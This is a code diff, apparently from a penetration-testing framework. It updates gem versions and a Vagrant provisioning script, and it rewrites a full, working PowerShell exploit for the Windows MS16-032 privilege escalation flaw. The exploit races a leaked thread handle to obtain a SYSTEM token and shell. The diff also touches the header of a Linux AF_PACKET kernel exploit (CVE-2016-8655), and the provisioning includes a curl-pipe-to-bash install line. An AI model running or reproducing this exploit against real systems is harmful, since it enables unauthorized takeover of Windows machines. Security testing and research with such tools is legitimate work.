 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.5, MIT
-octokit, 4.14.0, MIT
+nokogiri, 1.10.9, MIT
+octokit, 4.17.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
+parallel, 1.19.1, MIT
+parser, 2.7.0.4, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.4.0, MIT
@@ -80,66 +87,75 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 4.0.1, MIT
-rack, 1.6.11, MIT
+pry-byebug, 3.8.0, MIT
+public_suffix, 4.0.3, MIT
+rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
+rainbow, 3.0.0, MIT
 rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.6, unknown
+recog, 2.3.7, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.83, "New BSD"
+rex-powershell, 0.1.87, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.20, "New BSD"
+rex-socket, 0.1.22, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
+rexml, 3.2.4, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
-rspec-core, 3.9.0, MIT
-rspec-expectations, 3.9.0, MIT
-rspec-mocks, 3.9.0, MIT
-rspec-rails, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
+rspec-expectations, 3.9.1, MIT
+rspec-mocks, 3.9.1, MIT
+rspec-rails, 3.9.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.0, MIT
+rspec-support, 3.9.2, MIT
+rubocop, 0.80.1, MIT
 ruby-macho, 2.2.0, MIT
+ruby-prof, 1.3.1, "Simplified BSD"
+ruby-progressbar, 1.10.1, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 2.0.0, "Simplified BSD"
+rubyzip, 2.3.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.1, MIT
-simplecov-html, 0.10.2, MIT
+simplecov, 0.18.2, MIT
+simplecov-html, 0.12.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 0.20.3, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.5, MIT
+ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
+unicode-display_width, 1.6.1, MIT
 warden, 1.2.7, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.20, MIT
+yard, 0.9.24, MIT
@@ -3,7 +3,7 @@

 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/xenial64"
+  config.vm.box = "ubuntu/bionic64"
  config.vm.network :forwarded_port, guest: 4444, host: 4444
  config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -28,7 +28,7 @@ Vagrant.configure(2) do |config|
    config.vm.provision "shell", inline: step
  end

-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
@@ -1,347 +1,371 @@
-# Copyright (c) 2016, Ruben Booren (@FuzzySec)
-# All rights reserved
-Add-Type -TypeDefinition @"
-    using System;
-    using System.Diagnostics;
-    using System.Runtime.InteropServices;
-    using System.Security.Principal;
+#function Invoke-MS16-032 {
+<#
+.SYNOPSIS
+    
+    PowerShell implementation of MS16-032. The exploit targets all vulnerable
+    operating systems that support PowerShell v2+. Credit for the discovery of
+    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
+    
+    Targets:
+    
+    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
+    * Tested on x32 Win7, x64 Win8, x64 2k12R2
+    
+    Notes:
+    
+    * In order for the race condition to succeed the machine must have 2+ CPU
+      cores. If testing in a VM just make sure to add a core if needed mkay.
+    * Want to know more about MS16-032 ==>
+      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

-    [StructLayout(LayoutKind.Sequential)]
-    public struct PROCESS_INFORMATION
-    {
-        public IntPtr hProcess;
-        public IntPtr hThread;
-        public int dwProcessId;
-        public int dwThreadId;
-    }
-
-    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
-    public struct STARTUPINFO
-    {
-        public Int32 cb;
-        public string lpReserved;
-        public string lpDesktop;
-        public string lpTitle;
-        public Int32 dwX;
-        public Int32 dwY;
-        public Int32 dwXSize;
-        public Int32 dwYSize;
-        public Int32 dwXCountChars;
-        public Int32 dwYCountChars;
-        public Int32 dwFillAttribute;
-        public Int32 dwFlags;
-        public Int16 wShowWindow;
-        public Int16 cbReserved2;
-        public IntPtr lpReserved2;
-        public IntPtr hStdInput;
-        public IntPtr hStdOutput;
-        public IntPtr hStdError;
-    }
-
-    [StructLayout(LayoutKind.Sequential)]
-    public struct SQOS
-    {
-        public int Length;
-        public int ImpersonationLevel;
-        public int ContextTrackingMode;
-        public bool EffectiveOnly;
-    }
-
-    public static class Advapi32
-    {
-        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
-        public static extern bool CreateProcessWithLogonW(
-            String userName,
-            String domain,
-            String password,
-            int logonFlags,
-            String applicationName,
-            String commandLine,
-            int creationFlags,
-            int environment,
-            String currentDirectory,
-            ref  STARTUPINFO startupInfo,
-            out PROCESS_INFORMATION processInformation);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool SetThreadToken(
-            ref IntPtr Thread,
-            IntPtr Token);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenThreadToken(
-            IntPtr ThreadHandle,
-            int DesiredAccess,
-            bool OpenAsSelf,
-            out IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenProcessToken(
-            IntPtr ProcessHandle,
-            int DesiredAccess,
-            ref IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public extern static bool DuplicateToken(
-            IntPtr ExistingTokenHandle,
-            int SECURITY_IMPERSONATION_LEVEL,
-            ref IntPtr DuplicateTokenHandle);
-    }
-
-    public static class Kernel32
-    {
-        [DllImport("kernel32.dll")]
-        public static extern uint GetLastError();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentProcess();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentThread();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern int GetThreadId(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        public static extern int GetProcessIdOfThread(IntPtr handle);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int SuspendThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int ResumeThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool TerminateProcess(
-            IntPtr hProcess,
-            uint uExitCode);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool CloseHandle(IntPtr hObject);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool DuplicateHandle(
-            IntPtr hSourceProcessHandle,
-            IntPtr hSourceHandle,
-            IntPtr hTargetProcessHandle,
-            ref IntPtr lpTargetHandle,
-            int dwDesiredAccess,
-            bool bInheritHandle,
-            int dwOptions);
-    }
-
-    public static class Ntdll
-    {
-        [DllImport("ntdll.dll", SetLastError=true)]
-        public static extern int NtImpersonateThread(
-            IntPtr ThreadHandle,
-            IntPtr ThreadToImpersonate,
-            ref SQOS SecurityQualityOfService);
-    }
+.DESCRIPTION
+	Author: Ruben Boonen (@FuzzySec)
+	Blog: http://www.fuzzysecurity.com/
+	License: BSD 3-Clause
+	Required Dependencies: PowerShell v2+
+	Optional Dependencies: None
+    
+.EXAMPLE
+	C:\PS> Invoke-MS16-032
+#>
+	Add-Type -TypeDefinition @"
+	using System;
+	using System.Diagnostics;
+	using System.Runtime.InteropServices;
+	using System.Security.Principal;
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public int dwProcessId;
+		public int dwThreadId;
+	}
+	
+	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+	public struct STARTUPINFO
+	{
+		public Int32 cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public Int32 dwX;
+		public Int32 dwY;
+		public Int32 dwXSize;
+		public Int32 dwYSize;
+		public Int32 dwXCountChars;
+		public Int32 dwYCountChars;
+		public Int32 dwFillAttribute;
+		public Int32 dwFlags;
+		public Int16 wShowWindow;
+		public Int16 cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct SQOS
+	{
+		public int Length;
+		public int ImpersonationLevel;
+		public int ContextTrackingMode;
+		public bool EffectiveOnly;
+	}
+	
+	public static class Advapi32
+	{
+		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+		public static extern bool CreateProcessWithLogonW(
+			String userName,
+			String domain,
+			String password,
+			int logonFlags,
+			String applicationName,
+			String commandLine,
+			int creationFlags,
+			int environment,
+			String currentDirectory,
+			ref  STARTUPINFO startupInfo,
+			out PROCESS_INFORMATION processInformation);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool SetThreadToken(
+			ref IntPtr Thread,
+			IntPtr Token);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenThreadToken(
+			IntPtr ThreadHandle,
+			int DesiredAccess,
+			bool OpenAsSelf,
+			out IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenProcessToken(
+			IntPtr ProcessHandle, 
+			int DesiredAccess,
+			ref IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public extern static bool DuplicateToken(
+			IntPtr ExistingTokenHandle,
+			int SECURITY_IMPERSONATION_LEVEL,
+			ref IntPtr DuplicateTokenHandle);
+	}
+	
+	public static class Kernel32
+	{
+		[DllImport("kernel32.dll")]
+		public static extern uint GetLastError();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentProcess();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentThread();
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern int GetThreadId(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError = true)]
+		public static extern int GetProcessIdOfThread(IntPtr handle);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int SuspendThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int ResumeThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool TerminateProcess(
+			IntPtr hProcess,
+			uint uExitCode);
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool CloseHandle(IntPtr hObject);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool DuplicateHandle(
+			IntPtr hSourceProcessHandle,
+			IntPtr hSourceHandle,
+			IntPtr hTargetProcessHandle,
+			ref IntPtr lpTargetHandle,
+			int dwDesiredAccess,
+			bool bInheritHandle,
+			int dwOptions);
+	}
+	
+	public static class Ntdll
+	{
+		[DllImport("ntdll.dll", SetLastError=true)]
+		public static extern int NtImpersonateThread(
+			IntPtr ThreadHandle,
+			IntPtr ThreadToImpersonate,
+			ref SQOS SecurityQualityOfService);
+	}
 "@
+	
+	function Get-ThreadHandle {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -ErrorAction SilentlyContinue -Verbose).FullName

-    function Get-ThreadHandle {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
-        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)

-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
+		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+		$lpTargetHandle = [IntPtr]::Zero
+		$CallResult = [Kernel32]::DuplicateHandle(
+			$ProcessInfo.hProcess, 0x4,
+			[Kernel32]::GetCurrentProcess(),
+			[ref]$lpTargetHandle, 0, $false,
+			0x00000002)
+		
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		
+		$lpTargetHandle
+	}
+	
+	function Get-SystemToken {
+		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
+	
+		$CallResult = [Kernel32]::SuspendThread($hThread)
+		if ($CallResult -ne 0) {
+			echo "[!] $hThread is a bad thread, exiting.."
+			Return
+		} echo "[+] Thread suspended"
+		
+		echo "[>] Wiping current impersonation token"
+		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
+		if (!$CallResult) {
+			echo "[!] SetThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[>] Building SYSTEM impersonation token"
+		# SecurityQualityOfService struct
+		$SQOS = New-Object SQOS
+		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+		# Undocumented API's, I like your style Microsoft ;)
+		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
+		if ($CallResult -ne 0) {
+			echo "[!] NtImpersonateThread failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		# Null $SysTokenHandle
+		$script:SysTokenHandle = [IntPtr]::Zero

-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
+		if (!$CallResult) {
+			echo "[!] OpenThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+		echo "[+] Resuming thread.."
+		$CallResult = [Kernel32]::ResumeThread($hThread)
+	}
+	
+	# main() <--- ;)
+	$ms16032 = @"
+	 __ __ ___ ___   ___     ___ ___ ___ 
+	|  V  |  _|_  | |  _|___|   |_  |_  |
+	|     |_  |_| |_| . |___| | |_  |  _|
+	|_|_|_|___|_____|___|   |___|___|___|
+	                                    
+	               [by b33f -> @FuzzySec]
+"@
+	
+	$ms16032
+	
+	# Check logical processor count, race condition requires 2+
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handle"
+	$hThread = Get-ThreadHandle
+	
+	# If no thread handle is captured, the box is patched
+	if ($hThread -eq 0) {
+		echo "[!] No valid thread handle was captured, exiting!`n"
+		Return
+	} else {
+		echo "[?] Done, using thread handle: $hThread"
+	} echo "`n[*] Sniffing out privileged impersonation token.."
+	
+	# Get handle to SYSTEM access token
+	Get-SystemToken
+	
+	# If we fail a check in Get-SystemToken, exit
+	if ($SysTokenHandle -eq 0) {
+		Return
+	}
+	
+	echo "`n[*] Sniffing out SYSTEM shell.."
+	echo "`n[>] Duplicating SYSTEM token"
+	$hDuplicateTokenHandle = [IntPtr]::Zero
+	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+	
+	# Simple PS runspace definition
+	echo "[>] Starting token race"
+	$Runspace = [runspacefactory]::CreateRunspace()
+	$StartTokenRace = [powershell]::Create()
+	$StartTokenRace.runspace = $Runspace
+	$Runspace.Open()
+	[void]$StartTokenRace.AddScript({
+		Param ($hThread, $hDuplicateTokenHandle)
+		while ($true) {
+			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
+		}
+	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
+	$AscObj = $StartTokenRace.BeginInvoke()
+	
+	echo "[>] Starting process race"
+	# Adding a timeout (10 seconds) here to safeguard from edge-cases
+	$SafeGuard = [diagnostics.stopwatch]::StartNew()
+	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $path1, "",
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, $cmd, $args1,
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+		
+		#---
+		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+		#---
+		# Missing this check used to cause the exploit to fail sometimes.
+		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
+		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
+		# reliable now!
+		#---
+		if (!$CallResult) {
+			continue
+		}
+			
+		$hTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+		# If we can't open the process token it's a SYSTEM shell!
+		if (!$CallResult) {
+			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+			$StartTokenRace.Stop()
+			$SafeGuard.Stop()
+			echo "$end"
+			Return
+		}
+			
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

-        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
-        $lpTargetHandle = [IntPtr]::Zero
-        $CallResult = [Kernel32]::DuplicateHandle(
-            $ProcessInfo.hProcess, 0x4,
-            [Kernel32]::GetCurrentProcess(),
-            [ref]$lpTargetHandle, 0, $false,
-            0x00000002)
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-
-        $lpTargetHandle
-    }
-
-    function Get-SystemToken {
-        echo "`n[?] Trying thread handle: $Thread"
-        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
-
-        $CallResult = [Kernel32]::SuspendThread($Thread)
-        if ($CallResult -ne 0) {
-            echo "[!] $Thread is a bad thread, moving on.."
-            Return
-        } echo "[+] Thread suspended"
-
-        echo "[>] Wiping current impersonation token"
-        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
-        if (!$CallResult) {
-            echo "[!] SetThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[>] Building SYSTEM impersonation token"
-        # SecurityQualityOfService struct
-        $SQOS = New-Object SQOS
-        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
-        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
-        # Undocumented API's, I like your style Microsoft ;)
-        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
-        if ($CallResult -ne 0) {
-            echo "[!] NtImpersonateThread failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        $script:SysTokenHandle = [IntPtr]::Zero
-        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
-        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
-        if (!$CallResult) {
-            echo "[!] OpenThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
-        echo "[+] Resuming thread.."
-        $CallResult = [Kernel32]::ResumeThread($Thread)
-    }
-
-    # main() <--- ;)
-
-    # Check logical processor count, race condition requires 2+
-    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
-    if ($([System.Environment]::ProcessorCount) -lt 2) {
-        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
-        Return
-    }
-
-    # Create array for Threads & TID's
-    $ThreadArray = @()
-    $TidArray = @()
-
-    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
-        $hThread = Get-ThreadHandle
-        $hThreadID = [Kernel32]::GetThreadId($hThread)
-        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
-        if ($TidArray -notcontains $hThreadID) {
-            $TidArray += $hThreadID
-            if ($hThread -ne 0) {
-                $ThreadArray += $hThread # This is what we need!
-            }
-        }
-    }
-
-    if ($($ThreadArray.length) -eq 0) {
-        echo "[!] No valid thread handles were captured, exiting!"
-        Return
-    } else {
-        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
-        echo "`n[?] Thread handle list:"
-        $ThreadArray
-    }
-
-    echo "`n[*] Sniffing out privileged impersonation token.."
-    foreach ($Thread in $ThreadArray){
-
-        # Get handle to SYSTEM access token
-        Get-SystemToken
-
-        echo "`n[*] Sniffing out SYSTEM shell.."
-        echo "`n[>] Duplicating SYSTEM token"
-        $hDuplicateTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
-
-        # Simple PS runspace definition
-        echo "[>] Starting token race"
-        $Runspace = [runspacefactory]::CreateRunspace()
-        $StartTokenRace = [powershell]::Create()
-        $StartTokenRace.runspace = $Runspace
-        $Runspace.Open()
-        [void]$StartTokenRace.AddScript({
-            Param ($Thread, $hDuplicateTokenHandle)
-            while ($true) {
-                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
-            }
-        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
-        $AscObj = $StartTokenRace.BeginInvoke()
-
-        echo "[>] Starting process race"
-        # Adding a timeout (10 seconds) here to safeguard from edge-cases
-        $SafeGuard = [diagnostics.stopwatch]::StartNew()
-        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
-
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
-
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $cmd, $args1,
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
-        $hTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
-
-        # If we can't open the process token it's a SYSTEM shell!
-        if (!$CallResult) {
-            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
-            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
-            $StartTokenRace.Stop()
-            $SafeGuard.Stop()
-            Return
-        }
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-        }
-
-        # Kill runspace & stopwatch if edge-case
-        $StartTokenRace.Stop()
-        $SafeGuard.Stop()
-    }
-    exit
+	}
+	
+	# Kill runspace & stopwatch if edge-case
+	$StartTokenRace.Stop()
+	$SafeGuard.Stop()
+#}
@@ -1,7 +1,7 @@
 /*
 chocobo_root.c
 linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP/SMAP bypasses.
+Includes KASLR and SMEP bypasses. No SMAP bypass.
 For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
 All kernel offsets have been tested on Ubuntu / Linux Mint.

@@ -11,7 +11,7 @@ user@ubuntu:~$ uname -a
